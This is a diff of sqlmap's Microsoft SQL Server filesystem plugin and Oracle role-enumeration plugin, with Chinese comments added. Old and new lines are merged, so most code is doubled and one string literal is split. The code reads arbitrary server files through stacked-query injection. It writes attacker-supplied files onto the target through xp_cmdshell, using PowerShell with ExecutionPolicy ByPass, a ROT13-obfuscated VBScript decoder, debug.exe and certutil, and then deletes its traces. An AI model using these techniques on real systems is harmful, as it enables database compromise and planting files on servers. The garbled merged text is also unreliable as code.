from lib.core.data import conf from lib.core.convert import rot13 # 导入 rot13 函数,用于 ROT13 编码
from lib.core.data import kb from lib.core.data import conf # 导入 conf 对象,用于访问全局配置信息
from lib.core.data import logger from lib.core.data import kb # 导入 kb 对象,用于访问全局知识库
from lib.core.enums import CHARSET_TYPE from lib.core.data import logger # 导入 logger 对象,用于输出日志
from lib.core.enums import EXPECTED from lib.core.enums import CHARSET_TYPE # 导入 CHARSET_TYPE 枚举,定义字符集类型
from lib.core.enums import PAYLOAD from lib.core.enums import EXPECTED # 导入 EXPECTED 枚举,定义期望的返回值类型
from lib.core.exception import SqlmapNoneDataException from lib.core.enums import PAYLOAD # 导入 PAYLOAD 枚举,定义注入类型
from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.exception import SqlmapNoneDataException # 导入 SqlmapNoneDataException 异常类,用于表示没有数据
from lib.request import inject from lib.core.exception import SqlmapUnsupportedFeatureException # 导入 SqlmapUnsupportedFeatureException 异常类,用于表示不支持的功能
from lib.request import inject # 导入 inject 函数,用于执行 SQL 注入请求
from plugins.generic.filesystem import Filesystem as GenericFilesystem
from plugins.generic.filesystem import Filesystem as GenericFilesystem # 导入 GenericFilesystem 类,作为当前类的父类
# 定义 Filesystem 类,继承自 GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
# 定义 _dataToScr 方法,用于将数据转换为 debug.exe 脚本
def _dataToScr(self, fileContent, chunkName): def _dataToScr(self, fileContent, chunkName):
fileLines = [] fileLines = [] # 初始化文件行列表
fileSize = len(fileContent) fileSize = len(fileContent) # 获取文件大小
lineAddr = 0x100 lineAddr = 0x100 # 设置起始地址
lineLen = 20 lineLen = 20 # 设置每行长度
fileLines.append("n %s" % chunkName) fileLines.append("n %s" % chunkName) # 添加 debug.exe 的 'n' 命令,用于设置文件名
fileLines.append("rcx") fileLines.append("rcx") # 添加 debug.exe 的 'rcx' 命令,用于设置寄存器 cx
fileLines.append("%x" % fileSize) fileLines.append("%x" % fileSize) # 添加文件大小
fileLines.append("f 0100 %x 00" % fileSize) fileLines.append("f 0100 %x 00" % fileSize) # 添加 debug.exe 的 'f' 命令,用于填充内存
# 遍历文件内容,将每一行转换为 debug.exe 的 'e' 命令
for fileLine in xrange(0, len(fileContent), lineLen): for fileLine in xrange(0, len(fileContent), lineLen):
scrString = "" scrString = "" # 初始化每行字符串
for lineChar in fileContent[fileLine:fileLine + lineLen]: for lineChar in fileContent[fileLine:fileLine + lineLen]:
strLineChar = encodeHex(lineChar, binary=False) strLineChar = encodeHex(lineChar, binary=False) # 将字符转换为十六进制字符串
if not scrString: if not scrString:
scrString = "e %x %s" % (lineAddr, strLineChar) scrString = "e %x %s" % (lineAddr, strLineChar) # 如果是第一个字符,则添加 'e' 命令
else: else:
scrString += " %s" % strLineChar scrString += " %s" % strLineChar # 添加字符
lineAddr += len(strLineChar) // 2 lineAddr += len(strLineChar) // 2 # 更新地址
fileLines.append(scrString) fileLines.append(scrString) # 添加到文件行列表
fileLines.append("w") fileLines.append("w") # 添加 debug.exe 的 'w' 命令,用于写入文件
fileLines.append("q") fileLines.append("q") # 添加 debug.exe 的 'q' 命令,用于退出 debug.exe
return fileLines return fileLines # 返回文件行列表
# 定义 _updateDestChunk 方法,用于更新目标文件的 chunk
def _updateDestChunk(self, fileContent, tmpPath): def _updateDestChunk(self, fileContent, tmpPath):
randScr = "tmpf%s.scr" % randomStr(lowercase=True) randScr = "tmpf%s.scr" % randomStr(lowercase=True) # 生成随机的 debug.exe 脚本文件名
chunkName = randomStr(lowercase=True) chunkName = randomStr(lowercase=True) # 生成随机的 chunk 文件名
fileScrLines = self._dataToScr(fileContent, chunkName) fileScrLines = self._dataToScr(fileContent, chunkName) # 将文件内容转换为 debug.exe 脚本
logger.debug("uploading debug script to %s\\%s, please wait.." % (tmpPath, randScr)) logger.debug("uploading debug script to %s\\%s, please wait.." % (tmpPath, randScr))
self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr) self.xpCmdshellWriteFile(fileScrLines, tmpPath, randScr) # 使用 xp_cmdshell 将 debug.exe 脚本写入到服务器
logger.debug("generating chunk file %s\\%s from debug script %s" % (tmpPath, chunkName, randScr)) logger.debug("generating chunk file %s\\%s from debug script %s" % (tmpPath, chunkName, randScr))
# 执行 debug.exe 脚本,生成 chunk 文件
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
"debug < %s" % randScr, "debug < %s" % randScr,
@ -82,25 +88,26 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
return chunkName return chunkName # 返回 chunk 文件名
# 定义 stackedReadFile 方法,用于读取服务器文件内容,使用堆叠查询
def stackedReadFile(self, remoteFile): def stackedReadFile(self, remoteFile):
if not kb.bruteMode: if not kb.bruteMode:
infoMsg = "fetching file: '%s'" % remoteFile infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
result = [] result = [] # 初始化结果列表
txtTbl = self.fileTblName txtTbl = self.fileTblName # 获取文件表名
hexTbl = "%s%shex" % (self.fileTblName, randomStr()) hexTbl = "%s%shex" % (self.fileTblName, randomStr()) # 生成十六进制表名
self.createSupportTbl(txtTbl, self.tblField, "text") self.createSupportTbl(txtTbl, self.tblField, "text") # 创建支持表,用于存储文件内容
inject.goStacked("DROP TABLE %s" % hexTbl) inject.goStacked("DROP TABLE %s" % hexTbl) # 删除十六进制表
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)")) inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)")) # 创建十六进制表
logger.debug("loading the content of file '%s' into support table" % remoteFile) logger.debug("loading the content of file '%s' into support table" % remoteFile)
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, remoteFile, randomStr(10), randomStr(10)), silent=True) inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, remoteFile, randomStr(10), randomStr(10)), silent=True) # 使用 BULK INSERT 将文件内容读取到支持表
# Reference: https://web.archive.org/web/20120211184457/http://support.microsoft.com/kb/104829 # 将二进制数据转换为十六进制字符串的 SQL 查询
binToHexQuery = """DECLARE @charset VARCHAR(16) binToHexQuery = """DECLARE @charset VARCHAR(16)
DECLARE @counter INT DECLARE @counter INT
DECLARE @hexstr VARCHAR(4096) DECLARE @hexstr VARCHAR(4096)
@ -139,67 +146,76 @@ class Filesystem(GenericFilesystem):
END END
""" % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField) """ % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
binToHexQuery = binToHexQuery.replace(" ", "").replace("\n", " ") binToHexQuery = binToHexQuery.replace(" ", "").replace("\
inject.goStacked(binToHexQuery) ", " ") # 移除多余空格和换行符
inject.goStacked(binToHexQuery) # 执行 SQL 查询,将二进制数据转换为十六进制字符串
# 如果可以使用 UNION 注入,则直接读取十六进制表
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False) result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), resumeValue=False, blind=False, time=False, error=False)
# 如果无法使用 UNION 注入,则使用推断注入来读取十六进制表
if not result: if not result:
result = [] result = []
count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue("SELECT COUNT(*) FROM %s" % (hexTbl), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) # 获取十六进制表的行数
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
errMsg = "unable to retrieve the content of the " errMsg = "unable to retrieve the content of the "
errMsg += "file '%s'" % remoteFile errMsg += "file '%s'" % remoteFile
raise SqlmapNoneDataException(errMsg) raise SqlmapNoneDataException(errMsg)
indexRange = getLimitRange(count) indexRange = getLimitRange(count) # 生成索引范围
# 遍历索引范围,逐行读取十六进制数据
for index in indexRange: for index in indexRange:
chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL)
result.append(chunk) result.append(chunk)
inject.goStacked("DROP TABLE %s" % hexTbl) inject.goStacked("DROP TABLE %s" % hexTbl) # 删除十六进制表
return result return result # 返回读取的文件内容
# 定义 unionWriteFile 方法,用于使用 UNION 注入写入文件,但此方法不支持 SQL Server
def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
errMsg = "Microsoft SQL Server does not support file upload with " errMsg = "Microsoft SQL Server does not support file upload with "
errMsg += "UNION query SQL injection technique" errMsg += "UNION query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
# 定义 _stackedWriteFilePS 方法,用于使用 PowerShell 写入文件内容
def _stackedWriteFilePS(self, tmpPath, localFileContent, remoteFile, fileType): def _stackedWriteFilePS(self, tmpPath, localFileContent, remoteFile, fileType):
infoMsg = "using PowerShell to write the %s file content " % fileType infoMsg = "using PowerShell to write the %s file content " % fileType
infoMsg += "to file '%s'" % remoteFile infoMsg += "to file '%s'" % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
encodedFileContent = encodeBase64(localFileContent, binary=False) encodedFileContent = encodeBase64(localFileContent, binary=False) # 将文件内容进行 Base64 编码
encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) # 生成随机的 Base64 文件名
encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File) encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File) # 构建 Base64 文件路径
randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) # 生成随机的 PowerShell 脚本文件名
randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript) randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript) # 构建 PowerShell 脚本路径
localFileSize = len(encodedFileContent) localFileSize = len(encodedFileContent) # 获取 Base64 编码后的文件大小
chunkMaxSize = 1024 chunkMaxSize = 1024 # 设置最大 chunk 大小
logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath) logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath)
# 循环上传 Base64 编码后的文件内容
for i in xrange(0, localFileSize, chunkMaxSize): for i in xrange(0, localFileSize, chunkMaxSize):
wEncodedChunk = encodedFileContent[i:i + chunkMaxSize] wEncodedChunk = encodedFileContent[i:i + chunkMaxSize]
self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File) self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File) # 使用 xp_cmdshell 将 Base64 编码后的文件内容写入到服务器
# 构建 PowerShell 脚本
psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath
psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = " psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = "
psString += "[System.Convert]::FromBase64String($Base64); Set-Content " psString += "[System.Convert]::FromBase64String($Base64); Set-Content "
psString += "-Path \"%s\" -Value $Content -Encoding Byte" % remoteFile psString += "-Path \"%s\" -Value $Content -Encoding Byte" % remoteFile
logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath) logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath)
self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) # 使用 xp_cmdshell 将 PowerShell 脚本写入到服务器
logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % remoteFile) logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % remoteFile)
# 执行 PowerShell 脚本,将 Base64 编码后的文件内容解码并写入到目标文件
commands = ( commands = (
"powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, "powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
"del /F /Q \"%s\"" % encodedBase64FilePath, "del /F /Q \"%s\"" % encodedBase64FilePath,
@ -208,23 +224,26 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
# 定义 _stackedWriteFileDebugExe 方法,用于使用 debug.exe 写入文件内容
def _stackedWriteFileDebugExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType): def _stackedWriteFileDebugExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType infoMsg = "using debug.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % remoteFile infoMsg += "file content to file '%s', please wait.." % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
remoteFileName = ntpath.basename(remoteFile) remoteFileName = ntpath.basename(remoteFile) # 获取远程文件名
sFile = "%s\\%s" % (tmpPath, remoteFileName) sFile = "%s\\%s" % (tmpPath, remoteFileName) # 构建远程文件路径
localFileSize = os.path.getsize(localFile) localFileSize = os.path.getsize(localFile) # 获取本地文件大小
debugSize = 0xFF00 debugSize = 0xFF00 # 设置 debug.exe 的最大写入大小
# 如果文件小于 debug.exe 的最大写入大小,则直接写入
if localFileSize < debugSize: if localFileSize < debugSize:
chunkName = self._updateDestChunk(localFileContent, tmpPath) chunkName = self._updateDestChunk(localFileContent, tmpPath) # 将文件内容转换为 debug.exe 脚本并生成 chunk 文件
debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType) debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType)
debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, remoteFileName, remoteFile) debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, remoteFileName, remoteFile)
logger.debug(debugMsg) logger.debug(debugMsg)
# 将 chunk 文件重命名为目标文件名并移动到目标路径
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
"ren %s %s" % (chunkName, remoteFileName), "ren %s %s" % (chunkName, remoteFileName),
@ -232,6 +251,7 @@ class Filesystem(GenericFilesystem):
) )
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
# 如果文件大于 debug.exe 的最大写入大小,则分块写入
else: else:
debugMsg = "the file is larger than %d bytes. " % debugSize debugMsg = "the file is larger than %d bytes. " % debugSize
debugMsg += "sqlmap will split it into chunks locally, upload " debugMsg += "sqlmap will split it into chunks locally, upload "
@ -239,10 +259,12 @@ class Filesystem(GenericFilesystem):
debugMsg += "on the server, please wait.." debugMsg += "on the server, please wait.."
logger.debug(debugMsg) logger.debug(debugMsg)
# 循环分块写入文件
for i in xrange(0, localFileSize, debugSize): for i in xrange(0, localFileSize, debugSize):
localFileChunk = localFileContent[i:i + debugSize] localFileChunk = localFileContent[i:i + debugSize] # 获取文件 chunk
chunkName = self._updateDestChunk(localFileChunk, tmpPath) chunkName = self._updateDestChunk(localFileChunk, tmpPath) # 将文件 chunk 转换为 debug.exe 脚本并生成 chunk 文件
# 如果是第一个 chunk则重命名否则合并 chunk
if i == 0: if i == 0:
debugMsg = "renaming chunk " debugMsg = "renaming chunk "
copyCmd = "ren %s %s" % (chunkName, remoteFileName) copyCmd = "ren %s %s" % (chunkName, remoteFileName)
@ -253,6 +275,7 @@ class Filesystem(GenericFilesystem):
debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, remoteFileName) debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, remoteFileName)
logger.debug(debugMsg) logger.debug(debugMsg)
# 执行重命名或合并操作
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
copyCmd, copyCmd,
@ -263,6 +286,7 @@ class Filesystem(GenericFilesystem):
logger.debug("moving %s file %s to %s" % (fileType, sFile, remoteFile)) logger.debug("moving %s file %s to %s" % (fileType, sFile, remoteFile))
# 将合并后的文件移动到目标路径
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
"move /Y %s %s" % (remoteFileName, remoteFile) "move /Y %s %s" % (remoteFileName, remoteFile)
@ -270,15 +294,17 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
# 定义 _stackedWriteFileVbs 方法,用于使用 VBScript 写入文件内容
def _stackedWriteFileVbs(self, tmpPath, localFileContent, remoteFile, fileType): def _stackedWriteFileVbs(self, tmpPath, localFileContent, remoteFile, fileType):
infoMsg = "using a custom visual basic script to write the " infoMsg = "using a custom visual basic script to write the "
infoMsg += "%s file content to file '%s', please wait.." % (fileType, remoteFile) infoMsg += "%s file content to file '%s', please wait.." % (fileType, remoteFile)
logger.info(infoMsg) logger.info(infoMsg)
randVbs = "tmps%s.vbs" % randomStr(lowercase=True) randVbs = "tmps%s.vbs" % randomStr(lowercase=True) # 生成随机的 VBScript 文件名
randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True) # 生成随机的临时文件名
randFilePath = "%s\\%s" % (tmpPath, randFile) randFilePath = "%s\\%s" % (tmpPath, randFile) # 构建临时文件路径
# 构建 VBScript 脚本
vbs = """Qvz vachgSvyrCngu, bhgchgSvyrCngu vbs = """Qvz vachgSvyrCngu, bhgchgSvyrCngu
vachgSvyrCngu = "%f" vachgSvyrCngu = "%f"
bhgchgSvyrCngu = "%f" bhgchgSvyrCngu = "%f"
@ -334,18 +360,17 @@ class Filesystem(GenericFilesystem):
Raq Shapgvba""" Raq Shapgvba"""
# NOTE: https://github.com/sqlmapproject/sqlmap/issues/5581 # NOTE: https://github.com/sqlmapproject/sqlmap/issues/5581
vbs = rot13(vbs) vbs = rot13(vbs) # 对 VBScript 脚本进行 ROT13 编码
vbs = vbs.replace(" ", "") vbs = vbs.replace(" ", "") # 移除多余空格
encodedFileContent = encodeBase64(localFileContent, binary=False) encodedFileContent = encodeBase64(localFileContent, binary=False) # 将文件内容进行 Base64 编码
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile) # 使用 xp_cmdshell 将 Base64 编码后的文件内容写入到服务器
self.xpCmdshellWriteFile(encodedFileContent, tmpPath, randFile)
logger.debug("uploading a visual basic decoder stub %s\\%s, please wait.." % (tmpPath, randVbs)) logger.debug("uploading a visual basic decoder stub %s\\%s, please wait.." % (tmpPath, randVbs))
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) # 使用 xp_cmdshell 将 VBScript 脚本写入到服务器
self.xpCmdshellWriteFile(vbs, tmpPath, randVbs) # 执行 VBScript 脚本,将 Base64 编码后的文件内容解码并写入到目标文件
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
"cscript //nologo %s" % randVbs, "cscript //nologo %s" % randVbs,
@ -355,26 +380,28 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
# 定义 _stackedWriteFileCertutilExe 方法,用于使用 certutil.exe 写入文件内容
def _stackedWriteFileCertutilExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType): def _stackedWriteFileCertutilExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):
infoMsg = "using certutil.exe to write the %s " % fileType infoMsg = "using certutil.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % remoteFile infoMsg += "file content to file '%s', please wait.." % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
chunkMaxSize = 500 chunkMaxSize = 500 # 设置最大 chunk 大小
randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True) # 生成随机的文件名
randFilePath = "%s\\%s" % (tmpPath, randFile) randFilePath = "%s\\%s" % (tmpPath, randFile) # 构建文件路径
encodedFileContent = encodeBase64(localFileContent, binary=False) encodedFileContent = encodeBase64(localFileContent, binary=False) # 将文件内容进行 Base64 编码
splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) splittedEncodedFileContent = '\
'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) # 分块 Base64 编码文件内容
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile) # 使用 xp_cmdshell 将分块 Base64 编码后的文件内容写入到服务器
self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)
logger.debug("decoding the file to %s.." % remoteFile) logger.debug("decoding the file to %s.." % remoteFile)
# 执行 certutil.exe 命令,将 Base64 编码后的文件内容解码并写入到目标文件
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
"certutil -f -decode %s %s" % (randFile, remoteFile), "certutil -f -decode %s %s" % (randFile, remoteFile),
@ -383,6 +410,7 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
# 定义 stackedWriteFile 方法,用于使用堆叠查询写入文件
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
# NOTE: this is needed here because we use xp_cmdshell extended # NOTE: this is needed here because we use xp_cmdshell extended
# procedure to write a file on the back-end Microsoft SQL Server # procedure to write a file on the back-end Microsoft SQL Server
@ -390,15 +418,16 @@ class Filesystem(GenericFilesystem):
self.initEnv() self.initEnv()
self.getRemoteTempPath() self.getRemoteTempPath()
tmpPath = posixToNtSlashes(conf.tmpPath) tmpPath = posixToNtSlashes(conf.tmpPath) # 获取临时路径并转换为 NT 路径
remoteFile = posixToNtSlashes(remoteFile) remoteFile = posixToNtSlashes(remoteFile) # 将远程文件名转换为 NT 路径
checkFile(localFile) checkFile(localFile) # 检查本地文件是否存在
localFileContent = open(localFile, "rb").read() localFileContent = open(localFile, "rb").read() # 读取本地文件内容
self._stackedWriteFilePS(tmpPath, localFileContent, remoteFile, fileType) self._stackedWriteFilePS(tmpPath, localFileContent, remoteFile, fileType) # 尝试使用 PowerShell 写入文件
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) # 询问是否成功写入
# 如果 PowerShell 写入失败,则尝试使用 VBScript 写入文件
if written is False: if written is False:
message = "do you want to try to upload the file with " message = "do you want to try to upload the file with "
message += "the custom Visual Basic script technique? [Y/n] " message += "the custom Visual Basic script technique? [Y/n] "
@ -407,6 +436,7 @@ class Filesystem(GenericFilesystem):
self._stackedWriteFileVbs(tmpPath, localFileContent, remoteFile, fileType) self._stackedWriteFileVbs(tmpPath, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 如果 VBScript 写入失败,则尝试使用 debug.exe 写入文件
if written is False: if written is False:
message = "do you want to try to upload the file with " message = "do you want to try to upload the file with "
message += "the built-in debug.exe technique? [Y/n] " message += "the built-in debug.exe technique? [Y/n] "
@ -415,6 +445,7 @@ class Filesystem(GenericFilesystem):
self._stackedWriteFileDebugExe(tmpPath, localFile, localFileContent, remoteFile, fileType) self._stackedWriteFileDebugExe(tmpPath, localFile, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
# 如果 debug.exe 写入失败,则尝试使用 certutil.exe 写入文件
if written is False: if written is False:
message = "do you want to try to upload the file with " message = "do you want to try to upload the file with "
message += "the built-in certutil.exe technique? [Y/n] " message += "the built-in certutil.exe technique? [Y/n] "
@ -423,4 +454,4 @@ class Filesystem(GenericFilesystem):
self._stackedWriteFileCertutilExe(tmpPath, localFile, localFileContent, remoteFile, fileType) self._stackedWriteFileCertutilExe(tmpPath, localFile, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
return written return written # 返回是否成功写入

@ -5,85 +5,91 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
from lib.core.common import getLimitRange # 1. 导入必要的模块
from lib.core.common import isAdminFromPrivileges from lib.core.common import getLimitRange # 获取限制范围
from lib.core.common import isInferenceAvailable from lib.core.common import isAdminFromPrivileges # 判断是否为管理员
from lib.core.common import isNoneValue from lib.core.common import isInferenceAvailable # 判断是否可以使用推断注入
from lib.core.common import isNumPosStrValue from lib.core.common import isNoneValue # 判断是否为 None 值
from lib.core.common import isTechniqueAvailable from lib.core.common import isNumPosStrValue # 判断是否为数字正字符串值
from lib.core.compat import xrange from lib.core.common import isTechniqueAvailable # 判断是否可以使用特定注入技术
from lib.core.data import conf from lib.core.compat import xrange # 兼容 Python 2 和 3 的 xrange
from lib.core.data import kb from lib.core.data import conf # 全局配置信息
from lib.core.data import logger from lib.core.data import kb # 全局知识库
from lib.core.data import queries from lib.core.data import logger # 日志记录器
from lib.core.enums import CHARSET_TYPE from lib.core.data import queries # SQL 查询语句
from lib.core.enums import DBMS from lib.core.enums import CHARSET_TYPE # 字符集类型枚举
from lib.core.enums import EXPECTED from lib.core.enums import DBMS # 数据库管理系统枚举
from lib.core.enums import PAYLOAD from lib.core.enums import EXPECTED # 预期返回类型枚举
from lib.core.exception import SqlmapNoneDataException from lib.core.enums import PAYLOAD # 注入类型枚举
from lib.core.settings import CURRENT_USER from lib.core.exception import SqlmapNoneDataException # 没有数据异常
from lib.request import inject from lib.core.settings import CURRENT_USER # 当前用户
from plugins.generic.enumeration import Enumeration as GenericEnumeration from lib.request import inject # 注入相关函数
from plugins.generic.enumeration import Enumeration as GenericEnumeration # 通用枚举类
# 2. 定义一个类 Enumeration继承自 GenericEnumeration
class Enumeration(GenericEnumeration): class Enumeration(GenericEnumeration):
# 3. 获取数据库用户角色
def getRoles(self, query2=False): def getRoles(self, query2=False):
# 4. 输出获取数据库用户角色信息
infoMsg = "fetching database users roles" infoMsg = "fetching database users roles"
# 5. 从查询集中获取角色查询语句
rootQuery = queries[DBMS.ORACLE].roles rootQuery = queries[DBMS.ORACLE].roles
# 6. 如果用户名为当前用户,则获取当前用户名
if conf.user == CURRENT_USER: if conf.user == CURRENT_USER:
infoMsg += " for current user" infoMsg += " for current user"
conf.user = self.getCurrentUser() conf.user = self.getCurrentUser()
logger.info(infoMsg) logger.info(infoMsg)
# Set containing the list of DBMS administrators # 7. 存储管理员用户的集合
areAdmins = set() areAdmins = set()
# 8. 检查是否存在可用的注入技术或直接连接
if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
# 9. 选择使用哪个查询语句
if query2: if query2:
query = rootQuery.inband.query2 query = rootQuery.inband.query2
condition = rootQuery.inband.condition2 condition = rootQuery.inband.condition2
else: else:
query = rootQuery.inband.query query = rootQuery.inband.query
condition = rootQuery.inband.condition condition = rootQuery.inband.condition
# 10. 如果指定了用户名,则添加到查询条件中
if conf.user: if conf.user:
users = conf.user.split(',') users = conf.user.split(',')
query += " WHERE " query += " WHERE "
query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users))
# 11. 执行查询语句,获取用户角色信息
values = inject.getValue(query, blind=False, time=False) values = inject.getValue(query, blind=False, time=False)
# 12. 如果没有获取到数据,尝试使用备用表 `USER_ROLE_PRIVS`
if not values and not query2: if not values and not query2:
infoMsg = "trying with table 'USER_ROLE_PRIVS'" infoMsg = "trying with table 'USER_ROLE_PRIVS'"
logger.info(infoMsg) logger.info(infoMsg)
return self.getRoles(query2=True) return self.getRoles(query2=True)
# 13. 处理获取到的用户角色信息
if not isNoneValue(values): if not isNoneValue(values):
